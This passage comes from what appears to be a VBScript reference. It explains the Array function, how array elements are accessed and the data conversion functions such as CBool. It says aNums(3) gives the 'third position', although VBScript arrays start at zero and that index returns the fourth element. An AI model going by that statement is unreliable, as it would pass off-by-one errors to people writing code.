The Array function returns a variant that contains an array. The following is an example:

Dim aNums as Variant
aNums = Array(1, 2, 3, 4, 5)
This would create an array with five values, 1 through 5. If no arguments are passed to the Array function, the array created is of zero length.

Accessing the elements of an array is done the same way in VBScript as in Visual Basic. For instance,
X = aNums(3)
would assign the value of the third position in the array aNums to the variable X.

Data Conversion Functions

The data conversion functions listed in Table B.1 take one Variant variable as an argument and return that value as the Variant subtype of that function.

For example, the CBool function would take a normal Variant as an argument and return a value into a Variant with the subtype Boolean.